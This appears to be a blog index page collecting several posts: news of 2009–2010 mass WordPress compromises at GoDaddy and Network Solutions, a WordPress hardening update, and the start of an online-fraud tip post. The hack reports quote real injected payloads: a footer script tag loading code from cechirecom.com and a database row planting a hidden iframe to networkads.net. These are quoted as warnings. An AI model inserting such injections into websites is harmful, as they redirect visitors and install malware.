Shared Server Blogs Hacked En Mass At Godaddy

Google’s Online Security Blog (August 2009):

Their malware list entries have more than doubled in a single year. In that time, they have seen as many as 40,000 websites compromised in one week. However they do admit this perceived increase may be due to improvements made in detection capabilities.

Another disturbing trend is many compromised web properties are pointing to hundreds of different source domains. The sources of attacks appear to be widening in scope.

But still… that’s a lot of malicious code and a lot of websites.

And just last weekend, Wordpress blogs hosted at Godaddy were hit with an interesting exploit that was not immediately detectable. Seems the malicious executable only kicked-in when traffic was referred from Google. So that made the exploit less obvious.

The exploit action consisted of a redirect and installation of malware on computers. Some bloggers found the code when they happened to be logged in as admin. The giveaway was an unusual effect on the Dashboard layout because the malware code interfered with the CSS loading.

In the view source mode, there was a script src redirect just above the </body> tag in all the .php files. And the infected website will redirect to “burnvirusnow34.xorg.pl.”

But perhaps some mild relief is found in the fact that WP databases were not affected, only the actual .php files. And a backup install prior to April 23 will restore order to your blog’s world.

However it is not known how the hackers are accessing the hosting accounts.

Of course Godaddy has issued a statement regarding shared hosting security measures. But they have also stated, “The compromise of your account is outside the scope of security that we provide for you. Virus scans are performed… but they may not pick up everything… hackers tend to upload custom scripts which are not picked up by the traditional malware scanners.”

Then they make standard comments alluding to your responsibilities as a website owner.

“The overall security of your password and the content within your account is your responsibility, as password compromises and compromises due to scripting can only be prevented by you.”

A blogger posted the following at Wordpress’s site regarding last weekends Godaddy assault.

“My wordpress blog, hosted on a shared linux hosting account at Godaddy, has been hacked. The hacker injected a javascript malicious redirect into the footer of each page:

<script src=”http://cechirecom.com/js.php”></script>

I have temporarily restored an earlier install of my blog, which has got rid of the redirect, and I’ll probably do a clean install later.”

Will A Back-Up Save Your Website or Blog After A Malware Attack?

Some of you may have noticed the WF has been down all day. I’m not sure why, but it’s possibly related to a second security attack on Network Solutions’ database center. The first attack occurred on or about April 8, 2010 in which a mass infection of Wordpress blogs was sustained at the same Network Solutions location.

Here are the details of the April 8 event:

A large number of blogs running WP 2.9.2 were infected with malware. According to Network Solutions it seemed unrelated to themes or plugins, and some employed WP-admin access blocked to all but a few selected IP’s via htpasswd, as well. The sole similarity was all were shared hosts at Network Solutions. A Network Solutions spokesperson said all of their WP blogs were affected.

It appeared to be an SQL injection attack, or larger issues within Network Solution databases, for the following reasons:

No files were created so that would eliminate the advantages of the more common security measures. The April 8th attack modified the “siteurl” within the wp-option table to point to a particular url. Among other things, this would completely break the layout of the site.

Here’s the code found inside blog databases:

(2, 0, ’siteurl’, ‘<iframe style=\”display:none\” height=\”0\” width=\” 1\” src=\”http://networkads.net/grep/\”></iframe>’, ‘yes’),

Network Solutions announced today’s attack is the second in two weeks. Of course they’re doing all they can to fix the issues.

This latest attack is widespread and impacts all sites: static HTML and blogs including Word Press and Joomla. These sites are being infected with iframe injections and encoded Javascript plus PDF exploits installed on certain sites. The encoded Javascript makes it possible for the iframe injection.

This seems to be an attack of wider scope and heightened degree of damage.

Part of the problem for many site owners results from many hosting companies maintaining their servers with Network Solutions. So don’t think your site could never be affected if an attack of this nature occurs on someone else’s property.

Network Solutions is now admitting this latest attack is happening at a deeper level. Their restoration attempts have sometimes caused malicious software to be restored because it was backed-up in their databases.

Related actions include Google announcing they are blacklisting as many affected sites as possible.

Tough day at Network Solutions.

Hello Everyone,

Since wordpress 2.7 was released on thursday I have been looking through the system and testing it. I have installed a dummy blog for the testing and have implemented security measures on the blog to see if there can be a smooth transition from WordPess Secured v2 which was recently released.

So far everything seems to be running fine but I am doing more test to make sure. I have got rid of the icons and created my own and put them in admin as they are much better looking. Will be spending the next few days going through some other things on the new release and will make a decision on a new release of WordPress Secured based off wordpress 2.7

Stay Tuned for more information…

James

More and more people are attracted to the ease of online shopping and are spending higher amounts. Unfortunately, the chances of becoming a victim of Internet fraud is also increasing. The Internet National Fraud Center Watch reported that the average loss to fraud victims for just the first six months of 2005 was $2,579. This is compared to the $895 average for all of 2004. Complaints relating to general merchandise purchases (goods never received or misrepresented) accounted for 30% of Internet fraud complaints, and auction purchases (goods never received or misrepresented) topped the list at 44%.

While many e-commerce Websites are reputable and have taken the necessary safety precautions to protect you, it never hurts to always proceed cautiously. If you are making an online purchase consider these easy steps:

Read the rest of this entry